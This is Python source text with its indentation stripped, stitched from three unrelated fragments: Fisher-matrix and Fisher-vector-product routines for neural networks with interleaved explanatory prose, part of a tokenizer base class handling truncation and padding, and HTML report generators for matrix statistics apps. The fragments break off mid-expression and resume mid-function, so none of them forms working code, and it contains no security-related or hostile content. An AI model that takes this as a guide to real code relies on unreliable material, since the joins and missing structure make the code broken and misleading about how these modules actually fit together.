__all__ = [
'fisher_for_cross_entropy',
'fvp_for_cross_entropy',
'zero_fisher',
'zero_fvp',
'fisher_for_cross_entropy_eigenvalues',
'fisher_free_for_cross_entropy',
'woodbury_ifvp'
]
_supported_types = [FISHER_EXACT, FISHER_MC, COV]
_supported_types_for_eig = _supported_types
_supported_shapes = [SHAPE_FULL, SHAPE_BLOCK_DIAG, SHAPE_KRON, SHAPE_DIAG]
_supported_shapes_for_eig = [SHAPE_FULL, SHAPE_BLOCK_DIAG]
def fisher_for_cross_entropy(
model,
fisher_types,
fisher_shapes,
inputs=None,
targets=None,
data_loader=None,
stats_name=None,
compute_param_grad=False,
n_mc_samples=1,
is_distributed=False,
all_reduce=False,
is_master=True,
matrix_manager=None,
):
if isinstance(fisher_types, str):
fisher_types = [fisher_types]
if isinstance(fisher_shapes, str):
fisher_shapes = [fisher_shapes]
# remove duplicates
fisher_types = set(fisher_types)
fisher_shapes = set(fisher_shapes)
for ftype in fisher_types:
assert ftype in _supported_types, \
f'Invalid fisher_type: {ftype}. ' \
f'fisher_type must be in {_supported_types}.'
for fshape in fisher_shapes:
assert fshape in _supported_shapes, \
f'Invalid fisher_shape: {fshape}. ' \
f'fisher_shape must be in {_supported_shapes}.'
zero_fisher(model, fisher_types)
# setup operations for mammoth_utils.autograd.extend
op_names = [_SHAPE_TO_OP[shape] for shape in fisher_shapes]
if compute_param_grad:
assert COV in fisher_types, \
f'"{COV}" must be in fisher_types when compute_param_grad is True.'
if data_loader is not None:
op_names.append(OP_ACCUMULATE_GRADS) # accumulate gradient
# setup matrix manager as needed
if matrix_manager is None:
matrix_manager = MatrixManager(model, fisher_types)
kwargs = dict(
compute_full_fisher=SHAPE_FULL in fisher_shapes,
compute_block_diag_fisher=SHAPE_BLOCK_DIAG in fisher_shapes,
compute_param_grad=compute_param_grad,
n_mc_samples=n_mc_samples
)
if data_loader is not None:
# accumulate fisher for an epoch
device = next(model.parameters()).device
for inputs, targets in data_loader:
inputs, targets = inputs.to(device), targets.to(device)
with extend(model, op_names):
_fisher_for_cross_entropy(
model, fisher_types, inputs, targets, **kwargs
)
if stats_name is not None:
matrix_manager.accumulate_matrices(stats_name)
if compute_param_grad:
data_loader_gradient(
model,
data_loader,
has_accumulated=True,
is_distributed=is_distributed,
all_reduce=all_reduce,
is_master=is_master
)
else:
# compute fisher for a single batch
assert inputs is not None
with extend(model, op_names):
_fisher_for_cross_entropy(
model, fisher_types, inputs, targets, **kwargs
)
# reduce matrices
if is_distributed:
matrix_manager.reduce_matrices(stats_name, is_master, all_reduce)
return matrix_manager
def zero_fisher(module, fisher_types):
for child in module.children():
zero_fisher(child, fisher_types)
for ftype in fisher_types:
if hasattr(module, ftype):
delattr(module, ftype)
def zero_fvp(module, fisher_types):
for child in module.children():
zero_fvp(child, fisher_types)
for ftype in fisher_types:
attr = _get_fvp_attr(ftype)
if hasattr(module, attr):
delattr(module, attr)
def _check_fisher_type_shape(fisher_type, fisher_shape):
assert fisher_type in _supported_types_for_eig, \
f'Invalid fisher_type: {fisher_type}. ' \
f'fisher_type must be in {_supported_types_for_eig}.'
assert fisher_shape in _supported_shapes_for_eig, \
f'Invalid fisher_shape: {fisher_shape}. ' \
f'fisher_shape must be in {_supported_shapes_for_eig}.'
def fisher_for_cross_entropy_eigenvalues(
model,
fisher_type,
fisher_shape,
data_loader=None,
inputs=None,
targets=None,
n_mc_samples=1,
top_n=1,
max_iters=100,
tol=1e-3,
is_distributed=False,
print_progress=False
):
_check_fisher_type_shape(fisher_type, fisher_shape)
def fvp_fn(vec, x, y):
return fvp_for_cross_entropy(vec,
model,
fisher_type,
fisher_shape,
inputs=x,
targets=y,
n_mc_samples=n_mc_samples)
# for making MC sampling at each iteration deterministic
random_seed = int(torch.rand(1) * 100) if fisher_type == FISHER_MC else None
eigvals, eigvecs = power_method(fvp_fn,
model,
data_loader=data_loader,
inputs=inputs,
targets=targets,
top_n=top_n,
max_iters=max_iters,
tol=tol,
is_distributed=is_distributed,
print_progress=print_progress,
random_seed=random_seed
)
return eigvals, eigvecs
def fisher_free_for_cross_entropy(
model,
b,
fisher_type,
fisher_shape,
data_loader=None,
inputs=None,
targets=None,
init_x=None,
damping=1e-3,
n_mc_samples=1,
max_iters=None,
tol=1e-8,
preconditioner=None,
is_distributed=False,
print_progress=False,
random_seed=None,
save_log=False
):
_check_fisher_type_shape(fisher_type, fisher_shape)
def fvp_fn(vec, x, y):
return fvp_for_cross_entropy(vec,
model,
fisher_type,
fisher_shape,
inputs=x,
targets=y,
n_mc_samples=n_mc_samples)
# for making MC sampling at each iteration deterministic
if fisher_type == FISHER_MC and random_seed is None:
random_seed = int(torch.rand(1) * 100)
return conjugate_gradient_method(fvp_fn,
b,
data_loader=data_loader,
inputs=inputs,
targets=targets,
init_x=init_x,
damping=damping,
max_iters=max_iters,
tol=tol,
preconditioner=preconditioner,
is_distributed=is_distributed,
print_progress=print_progress,
random_seed=random_seed,
save_log=save_log)
def fvp_for_cross_entropy(
vec,
model,
fisher_type,
fisher_shape,
inputs,
targets=None,
n_mc_samples=1
):
compute_full_fvp = compute_block_diag_fvp = False
if fisher_shape == SHAPE_FULL:
compute_full_fvp = True
elif fisher_shape == SHAPE_BLOCK_DIAG:
compute_block_diag_fvp = True
else:
raise ValueError(f'Invalid fisher_shape: {fisher_shape}.')
zero_fvp(model, [fisher_type])
with extend(model, OP_BATCH_GRADS):
_fisher_for_cross_entropy(
model, [fisher_type],
inputs,
targets,
compute_full_fvp=compute_full_fvp,
compute_block_diag_fvp=compute_block_diag_fvp,
vec=vec,
n_mc_samples=n_mc_samples
)
if fisher_shape == SHAPE_FULL:
return getattr(model, _get_fvp_attr(fisher_type))
else:
rst = []
for module in model.modules():
fvp = getattr(module, _get_fvp_attr(fisher_type), None)
if fvp is not None:
rst.extend(fvp)
return rst
def _fisher_for_cross_entropy(
model,
fisher_types,
inputs,
targets=None,
compute_param_grad=False,
compute_full_fisher=False,
compute_full_fvp=False,
compute_block_diag_fisher=False,
compute_block_diag_fvp=False,
vec=None,
n_mc_samples=1
):
logits = model(inputs)
log_probs = F.log_softmax(logits, dim=1)
probs = None
def loss_and_backward(target):
model.zero_grad(set_to_none=True)
loss = F.nll_loss(log_probs, target, reduction='sum')
loss.backward(retain_graph=True)
if compute_full_fisher:
_full_covariance(model)
if compute_full_fvp:
_full_cvp(model, vec)
if compute_block_diag_fisher:
_block_diag_covariance(model)
if compute_block_diag_fvp:
_block_diag_cvp(model, vec)
if FISHER_MC in fisher_types:
probs = F.softmax(logits, dim=1)
_fisher_mc(loss_and_backward, model, probs, n_mc_samples)
if FISHER_EXACT in fisher_types:
if probs is None:
probs = F.softmax(logits, dim=1)
_fisher_exact(loss_and_backward, model, probs)
if COV in fisher_types:
assert targets is not None, 'targets must be specified for computing covariance.'
_covariance(loss_and_backward, model, targets, compute_param_grad)
def _module_batch_grads(model):
rst = []
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
batch_grads = operation.get_op_results()[OP_BATCH_GRADS]
rst.append((module, batch_grads))
return rst
def _module_batch_flatten_grads(model):
rst = []
for module, batch_grads in _module_batch_grads(model):
batch_flatten_grads = torch.cat(
[g.flatten(start_dim=1) for g in batch_grads.values()],
dim=1
)
rst.append((module, batch_flatten_grads))
return rst
def _module_batch_gvp(model, vec):
rst = []
pointer = 0
for module, batch_grads in _module_batch_grads(model):
batch_gvp = None
for b_g in batch_grads.values():
v = vec[pointer]
b_gvp = b_g.mul(v.unsqueeze(0)).flatten(start_dim=1).sum(1) # n
if batch_gvp is None:
batch_gvp = b_gvp
else:
batch_gvp += b_gvp
pointer += 1
rst.append((module, batch_gvp))
assert pointer == len(vec)
return rst
def _full_covariance(model):
batch_all_g = []
for _, batch_g in _module_batch_flatten_grads(model):
batch_all_g.append(batch_g)
batch_all_g = torch.cat(batch_all_g, dim=1) # n x p_all
cov_full = torch.matmul(batch_all_g.T, batch_all_g) # p_all x p_all
setattr(model, _COV_FULL, cov_full)
def _block_diag_covariance(model):
for module, batch_g in _module_batch_flatten_grads(model):
cov_block = torch.matmul(batch_g.T, batch_g) # p_module x p_module
setattr(module, _COV_BLOCK_DIAG, cov_block)
def _full_cvp(model, vec):
"""
g: n x p
v: p
c = sum[gg^t]: p x p
cvp = sum[gg^t]v = sum[g(g^t)v]: p
"""
# compute batched (g^t)v
batch_all_gvp = None
for module, batch_gvp in _module_batch_gvp(model, vec):
if batch_all_gvp is None:
batch_all_gvp = batch_gvp
else:
batch_all_gvp += batch_gvp
# compute cvp = sum[g(g^t)v]
cvp = []
for module, batch_grads in _module_batch_grads(model):
for b_g in batch_grads.values():
cvp.append(torch.einsum('n...,n->...', b_g, batch_all_gvp))
setattr(model, _CVP_FULL, cvp)
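The docstring identity above is what makes `_full_cvp` matrix-free: `(sum_i g_i g_i^T) v == sum_i g_i * (g_i^T v)`, so the p x p covariance never has to be materialized. A pure-Python numeric check with hypothetical per-sample gradients:

```python
# Hypothetical per-sample gradients: n=2 samples, p=2 parameters.
grads = [[1.0, 2.0], [3.0, -1.0]]
v = [0.5, 2.0]

# Direct route: materialize C = sum_i g_i g_i^T (p x p), then C v.
C = [[sum(g[a] * g[b] for g in grads) for b in range(2)] for a in range(2)]
direct = [sum(C[a][b] * v[b] for b in range(2)) for a in range(2)]

# Matrix-free route used above: cvp = sum_i g_i * (g_i . v).
gvp = [sum(ga * va for ga, va in zip(g, v)) for g in grads]
matrix_free = [sum(g[a] * s for g, s in zip(grads, gvp)) for a in range(2)]
```

Both routes agree, but the matrix-free one only ever stores vectors of length p, which is why the batched `gvp` reduction scales to large models.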
def _block_diag_cvp(model, vec):
"""
g: n x p
v: p
c = sum[gg^t]: p x p
cvp = sum[gg^t]v = sum[g(g^t)v]: p
"""
batch_gvp_dict = {k: v for k, v in _module_batch_gvp(model, vec)}
for module, batch_grads in _module_batch_grads(model):
cvp = []
# compute cvp = sum[g(g^t)v]
batch_gvp = batch_gvp_dict[module]
for b_g in batch_grads.values():
cvp.append(torch.einsum('n...,n->...', b_g, batch_gvp))
setattr(module, _CVP_BLOCK_DIAG, cvp)
def _fisher_mc(loss_and_backward, model, probs, n_mc_samples=1):
dist = torch.distributions.Categorical(probs)
_targets = dist.sample((n_mc_samples, ))
for i in range(n_mc_samples):
loss_and_backward(_targets[i])
_register_fisher(
model,
FISHER_MC,
scale=1 / n_mc_samples,
accumulate=True
)
def _fisher_exact(loss_and_backward, model, probs):
_, n_classes = probs.shape
probs, _targets = torch.sort(probs, dim=1, descending=True)
sqrt_probs = torch.sqrt(probs)
for i in range(n_classes):
with _grads_scale(model, sqrt_probs[:, i]):
loss_and_backward(_targets[:, i])
_register_fisher(
model, FISHER_EXACT, accumulate=True
)
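`_fisher_exact` exploits the identity `F = sum_c p_c * g_c g_c^T`: scaling each class's gradient by `sqrt(p_c)` before the backward pass makes the accumulated outer products equal the probability-weighted expectation, without ever forming the weighting explicitly. A small numeric check with hypothetical per-class gradients for a single sample:

```python
probs = [0.7, 0.3]                 # softmax outputs for one sample
grads = [[1.0, -2.0], [0.5, 4.0]]  # hypothetical per-class gradients

# Expectation form: F = sum_c p_c * g_c g_c^T
F_expect = [[sum(p * g[a] * g[b] for p, g in zip(probs, grads))
             for b in range(2)] for a in range(2)]

# sqrt-scaled form, as done via _grads_scale: accumulate outer
# products of (sqrt(p_c) * g_c) over all classes.
F_scaled = [[0.0, 0.0], [0.0, 0.0]]
for p, g in zip(probs, grads):
    sg = [p ** 0.5 * x for x in g]
    for a in range(2):
        for b in range(2):
            F_scaled[a][b] += sg[a] * sg[b]
```

The two forms match up to floating-point rounding from the square root.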
def _covariance(loss_and_backward, model, targets, compute_param_grad=False):
if compute_param_grad:
loss_and_backward(targets)
else:
with disable_param_grad(model):
loss_and_backward(targets)
_register_fisher(model, COV)
@contextmanager
def _grads_scale(model, scale):
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
operation.grads_scale = scale
yield
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
operation.grads_scale = None
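`_grads_scale` is a plain set-then-reset context manager over the per-module `operation` objects. A self-contained sketch of the pattern (note that, like the original, this version has no `try/finally`, so an exception inside the `with` body would skip the reset):

```python
from contextlib import contextmanager

class _Op:
    grads_scale = None

@contextmanager
def _scale_ops(ops, scale):
    # Set the scale on every op, yield control, then reset.
    for op in ops:
        op.grads_scale = scale
    yield
    for op in ops:
        op.grads_scale = None

ops = [_Op(), _Op()]
with _scale_ops(ops, 0.25):
    inside = [op.grads_scale for op in ops]
after = [op.grads_scale for op in ops]
```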
def _register_fisher(model, fisher_type, scale=1., accumulate=False):
"""
module.fisher_{fisher_type} = op_results
op_results = {
'diag': {'weight': torch.Tensor, 'bias': torch.Tensor},
'kron': {'A': torch.Tensor, 'B': torch.Tensor},
'block_diag': torch.Tensor,
'unit_wise': torch.Tensor,
}
"""
device = next(model.parameters()).device
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
op_results = operation.get_op_results()
kron = diag = unit = None
if OP_COV_KRON in op_results:
rst = op_results[OP_COV_KRON]
kron = Kron(rst['A'], rst['B'], device=device)
if OP_COV_DIAG in op_results:
rst = op_results[OP_COV_DIAG]
diag = Diag(
rst.get('weight', None), rst.get('bias', None), device=device
)
if OP_COV_UNIT_WISE in op_results:
rst = op_results[OP_COV_UNIT_WISE]
unit = UnitWise(rst, device=device)
operation.clear_op_results()
# move block_diag/kron/diag fisher
_accumulate_fisher(
module,
_COV_BLOCK_DIAG,
fisher_type,
kron=kron,
diag=diag,
unit=unit,
scale=scale,
accumulate=accumulate
)
# move block_diag fvp
_accumulate_fvp(
module, _CVP_BLOCK_DIAG, fisher_type, scale, accumulate
)
# move full fisher
_accumulate_fisher(
model, _COV_FULL, fisher_type, scale=scale, accumulate=accumulate
)
# move full fvp
_accumulate_fvp(model, _CVP_FULL, fisher_type, scale, accumulate)
def _accumulate_fisher(
module,
data_src_attr,
dst_attr,
kron=None,
diag=None,
unit=None,
scale=1.,
accumulate=False
):
data = getattr(module, data_src_attr, None)
if all(v is None for v in [data, kron, diag, unit]):
return
device = next(module.parameters()).device
fisher = SymMatrix(data, kron, diag, unit, device=device)
fisher.scaling(scale)
dst_fisher = getattr(module, dst_attr, None)
if (dst_fisher is None) or (not accumulate):
setattr(module, dst_attr, fisher)
else:
# accumulate fisher
dst_fisher += fisher
if dst_fisher.has_kron:
# kron.A is not accumulated; keep only the latest factor
dst_fisher.kron.A = fisher.kron.A
setattr(module, dst_attr, dst_fisher)
if data is not None:
delattr(module, data_src_attr)
def _accumulate_fvp(module, src_attr, fisher_type, scale=1., accumulate=False):
dst_attr = _get_fvp_attr(fisher_type)
cvp = getattr(module, | |
= None,
num_tokens_to_remove: int = 0,
truncation_strategy: Union[str, TruncationStrategy] = "longest_first",
stride: int = 0,
) -> Tuple[List[int], List[int], List[int]]:
if num_tokens_to_remove <= 0:
return ids, pair_ids, []
if not isinstance(truncation_strategy, TruncationStrategy):
truncation_strategy = TruncationStrategy(truncation_strategy)
overflowing_tokens = []
if truncation_strategy == TruncationStrategy.LONGEST_FIRST:
for _ in range(num_tokens_to_remove):
if pair_ids is None or len(ids) > len(pair_ids):
if not overflowing_tokens:
window_len = min(len(ids), stride + 1)
else:
window_len = 1
overflowing_tokens.extend(ids[-window_len:])
ids = ids[:-1]
else:
if not overflowing_tokens:
window_len = min(len(pair_ids), stride + 1)
else:
window_len = 1
overflowing_tokens.extend(pair_ids[-window_len:])
pair_ids = pair_ids[:-1]
elif truncation_strategy == TruncationStrategy.ONLY_FIRST:
if len(ids) > num_tokens_to_remove:
window_len = min(len(ids), stride + num_tokens_to_remove)
overflowing_tokens = ids[-window_len:]
ids = ids[:-num_tokens_to_remove]
else:
logger.error(
f"We need to remove {num_tokens_to_remove} to truncate the input "
f"but the first sequence has a length {len(ids)}. "
f"Please select another truncation strategy than {truncation_strategy}, "
f"for instance 'longest_first' or 'only_second'."
)
elif truncation_strategy == TruncationStrategy.ONLY_SECOND and pair_ids is not None:
if len(pair_ids) > num_tokens_to_remove:
window_len = min(len(pair_ids), stride + num_tokens_to_remove)
overflowing_tokens = pair_ids[-window_len:]
pair_ids = pair_ids[:-num_tokens_to_remove]
else:
logger.error(
f"We need to remove {num_tokens_to_remove} to truncate the input "
f"but the second sequence has a length {len(pair_ids)}. "
f"Please select another truncation strategy than {truncation_strategy}, "
f"for instance 'longest_first' or 'only_first'."
)
return (ids, pair_ids, overflowing_tokens)
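Under the `longest_first` strategy, tokens are removed one at a time from whichever sequence is currently longer, and `stride` only widens the very first overflow window. A standalone mimic (simplified from the branch above, with hypothetical token ids) showing the resulting behavior:

```python
def longest_first_truncate(ids, pair_ids, num_tokens_to_remove, stride=0):
    # Simplified standalone mimic of the LONGEST_FIRST branch above.
    overflowing = []
    for _ in range(num_tokens_to_remove):
        if pair_ids is None or len(ids) > len(pair_ids):
            window = min(len(ids), stride + 1) if not overflowing else 1
            overflowing.extend(ids[-window:])
            ids = ids[:-1]
        else:
            window = min(len(pair_ids), stride + 1) if not overflowing else 1
            overflowing.extend(pair_ids[-window:])
            pair_ids = pair_ids[:-1]
    return ids, pair_ids, overflowing

ids, pair_ids, overflow = longest_first_truncate([1, 2, 3, 4, 5], None, 2, stride=1)
```

With `stride=1` the first removal captures a two-token window, and later removals capture one token each, so removed tokens near the boundary can appear twice in the overflow list.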
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(encoded_inputs["input_ids"])
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = (
padding_strategy != PaddingStrategy.DO_NOT_PAD and len(encoded_inputs["input_ids"]) != max_length
)
if needs_to_be_padded:
difference = max_length - len(encoded_inputs["input_ids"])
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = [1] * len(encoded_inputs["input_ids"]) + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs["input_ids"] = encoded_inputs["input_ids"] + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + [1] * len(encoded_inputs["input_ids"])
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs["input_ids"] = [self.pad_token_id] * difference + encoded_inputs["input_ids"]
else:
raise ValueError("Invalid padding strategy: " + str(self.padding_side))
else:
if return_attention_mask:
encoded_inputs["attention_mask"] = [1] * len(encoded_inputs["input_ids"])
return encoded_inputs
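The padding arithmetic above reduces to: round `max_length` up to the next multiple of `pad_to_multiple_of`, then extend `input_ids` and mirror the extension in `attention_mask` (1 for real tokens, 0 for padding). A right-padding sketch with a hypothetical pad id:

```python
def pad_right(input_ids, max_length, pad_to_multiple_of=None, pad_id=0):
    # Round up, as in the pad_to_multiple_of branch above.
    if pad_to_multiple_of is not None and max_length % pad_to_multiple_of != 0:
        max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
    diff = max_length - len(input_ids)
    attention_mask = [1] * len(input_ids) + [0] * diff
    return input_ids + [pad_id] * diff, attention_mask

padded, mask = pad_right([11, 12, 13], max_length=5, pad_to_multiple_of=4)
```

Rounding to a multiple (commonly 8) lets downstream tensor cores operate on aligned sequence lengths.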
def batch_decode(
self, sequences: List[List[int]], skip_special_tokens: bool = False, clean_up_tokenization_spaces: bool = True
) -> List[str]:
return [
self.decode(
seq, skip_special_tokens=skip_special_tokens, clean_up_tokenization_spaces=clean_up_tokenization_spaces
)
for seq in sequences
]
def decode(
self, token_ids: List[int], skip_special_tokens: bool = False, clean_up_tokenization_spaces: bool = True
) -> str:
raise NotImplementedError
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
assert already_has_special_tokens and token_ids_1 is None, (
"You cannot use ``already_has_special_tokens=False`` with this tokenizer. "
"Please use a slow (full python) tokenizer to activate this argument. "
"Or set `return_special_tokens_mask=True` when calling the encoding method "
"to get the special tokens mask in any tokenizer. "
)
all_special_ids = self.all_special_ids # cache the property
special_tokens_mask = [1 if token in all_special_ids else 0 for token in token_ids_0]
return special_tokens_mask
@staticmethod
def clean_up_tokenization(out_string: str) -> str:
out_string = (
out_string.replace(" .", ".")
.replace(" ?", "?")
.replace(" !", "!")
.replace(" ,", ",")
.replace(" ' ", "'")
.replace(" n't", "n't")
.replace(" 'm", "'m")
.replace(" 's", "'s")
.replace(" 've", "'ve")
.replace(" 're", "'re")
)
return out_string
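`clean_up_tokenization` simply undoes the extra spaces a wordpiece-style detokenizer leaves around punctuation and common English contractions. Applying the same replacement chain to a sample string:

```python
def clean_up(out_string):
    # Same replacement chain as clean_up_tokenization above.
    return (
        out_string.replace(" .", ".")
        .replace(" ?", "?")
        .replace(" !", "!")
        .replace(" ,", ",")
        .replace(" ' ", "'")
        .replace(" n't", "n't")
        .replace(" 'm", "'m")
        .replace(" 's", "'s")
        .replace(" 've", "'ve")
        .replace(" 're", "'re")
    )

cleaned = clean_up("do n't stop , please .")
```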
def _is_whitespace(char):
"""Checks whether `char` is a whitespace character."""
# \t, \n, and \r are technically control characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `char` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `char` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
def _is_end_of_word(text):
"""Checks whether the last character in text is a punctuation, control, or whitespace character."""
last_char = text[-1]
return bool(_is_control(last_char) | _is_punctuation(last_char) | _is_whitespace(last_char))
def _is_start_of_word(text):
"""Checks whether the first character in text is a punctuation, control, or whitespace character."""
first_char = text[0]
return bool(_is_control(first_char) | _is_punctuation(first_char) | _is_whitespace(first_char))
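The comment in `_is_punctuation` matters in practice: characters such as `^` and `` ` `` fall in Unicode category `Sk` (modifier symbol), not `P*`, yet the ASCII range checks still classify them as punctuation. A standalone copy of the logic demonstrating this:

```python
import unicodedata

def is_punctuation(char):
    # Same logic as _is_punctuation above: ASCII symbol ranges first,
    # then the Unicode "P*" punctuation categories.
    cp = ord(char)
    if (33 <= cp <= 47) or (58 <= cp <= 64) or (91 <= cp <= 96) or (123 <= cp <= 126):
        return True
    return unicodedata.category(char).startswith("P")

results = {c: is_punctuation(c) for c in "^`$a5!"}
```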
class PreTrainedTokenizer(PreTrainedTokenizerBase):
def __init__(self, **kwargs):
super().__init__(**kwargs)
# Added tokens - We store this for both slow and fast tokenizers
# until the serialization of Fast tokenizers is updated
self.added_tokens_encoder: Dict[str, int] = {}
self.added_tokens_decoder: Dict[int, str] = {}
self.unique_no_split_tokens: List[str] = []
@property
def is_fast(self) -> bool:
return False
@property
def vocab_size(self) -> int:
"""
:obj:`int`: Size of the base vocabulary (without the added tokens).
"""
raise NotImplementedError
def get_vocab(self) -> Dict[str, int]:
raise NotImplementedError()
def get_added_vocab(self) -> Dict[str, int]:
return self.added_tokens_encoder
def __len__(self):
return self.vocab_size + len(self.added_tokens_encoder)
def _add_tokens(self, new_tokens, special_tokens: bool = False) -> int:
new_tokens = [str(tok) for tok in new_tokens]
tokens_to_add = []
for token in new_tokens:
assert isinstance(token, str)
if not special_tokens and self.init_kwargs.get("do_lower_case", False):
token = token.lower()
if (
token != self.unk_token
and self.convert_tokens_to_ids(token) == self.convert_tokens_to_ids(self.unk_token)
and token not in tokens_to_add
):
tokens_to_add.append(token)
if self.verbose:
logger.info("Adding %s to the vocabulary", token)
added_tok_encoder = {tok: len(self) + i for i, tok in enumerate(tokens_to_add)}
added_tok_decoder = {v: k for k, v in added_tok_encoder.items()}
self.added_tokens_encoder.update(added_tok_encoder)
self.added_tokens_decoder.update(added_tok_decoder)
# Make sure we don't split on any special tokens (even if they were already in the vocab before, e.g. for Albert)
if special_tokens:
self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(new_tokens)))
else:
# Or on the newly added tokens
self.unique_no_split_tokens = sorted(set(self.unique_no_split_tokens).union(set(tokens_to_add)))
return len(tokens_to_add)
def num_special_tokens_to_add(self, pair: bool = False) -> int:
token_ids_0 = []
token_ids_1 = []
return len(self.build_inputs_with_special_tokens(token_ids_0, token_ids_1 if pair else None))
def tokenize(self, text: TextInput, **kwargs) -> List[str]:
def split_on_token(tok, text):
result = []
tok_extended = all_special_tokens_extended.get(tok, None)
split_text = text.split(tok)
full_word = ""
for i, sub_text in enumerate(split_text):
# AddedToken can control whitespace stripping around them.
# We use them for GPT2 and Roberta to have different behavior depending on the special token
# Cf. https://github.com/huggingface/transformers/pull/2778
# and https://github.com/huggingface/transformers/issues/3788
if isinstance(tok_extended, AddedToken):
if tok_extended.single_word:
# Try to avoid splitting on token
if (
i < len(split_text) - 1
and not _is_end_of_word(sub_text)
and not _is_start_of_word(split_text[i + 1])
):
# Don't extract the special token
full_word += sub_text + tok
elif full_word:
full_word += sub_text
result += [full_word]
full_word = ""
continue
# Strip white spaces on the right
if tok_extended.rstrip and i > 0:
# A bit counter-intuitive but we strip the left of the string
# since tok_extended.rstrip means the special token is eating all white spaces on its right
sub_text = sub_text.lstrip()
# Strip white spaces on the left
if tok_extended.lstrip and i < len(split_text) - 1:
sub_text = sub_text.rstrip() # Opposite here
else:
# We strip left and right by default
if i < len(split_text) - 1:
sub_text = sub_text.rstrip()
if i > 0:
sub_text = sub_text.lstrip()
if i == 0 and not sub_text:
result += [tok]
elif i == len(split_text) - 1:
if sub_text:
result += [sub_text]
else:
pass
else:
if sub_text:
result += [sub_text]
| |
for Simper App'
})
return html_report
def _generate_variable_stats_html_report(self, anosim_res, permanova_res, permdisp_res):
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'variable_stats_viewer_report.html')
visualization_content = self._generate_variable_stats_visualization_content(anosim_res,
permanova_res,
permdisp_res)
table_style_content = '''
table {
font-family: arial, sans-serif;
border-collapse: collapse;
width: 66%;
}
td, th {
border: 1px solid #dddddd;
text-align: left;
padding: 8px;
}
tr:nth-child(even) {
background-color: #dddddd;
}
</style>'''
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
report_template = report_template.replace('</style>',
table_style_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Variable Stats App'
})
return html_report
def _generate_rarefy_html_report(self, rarefied_matrix_dir,
rarecurve_image, obs_vs_rare_image, random_rare_df):
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'rarefy_matrix_viewer_report.html')
visualization_content = self._generate_rarefy_visualization_content(
output_directory,
rarefied_matrix_dir,
rarecurve_image,
obs_vs_rare_image,
random_rare_df)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Rarefy Matrix App'
})
return html_report
def _generate_transform_html_report(self, operations, heatmap_html_dir_l,
transformed_matrix_df, variable_specific):
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'transform_matrix_viewer_report.html')
visualization_content = self._generate_trans_visualization_content(
output_directory,
operations,
heatmap_html_dir_l,
transformed_matrix_df,
variable_specific)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
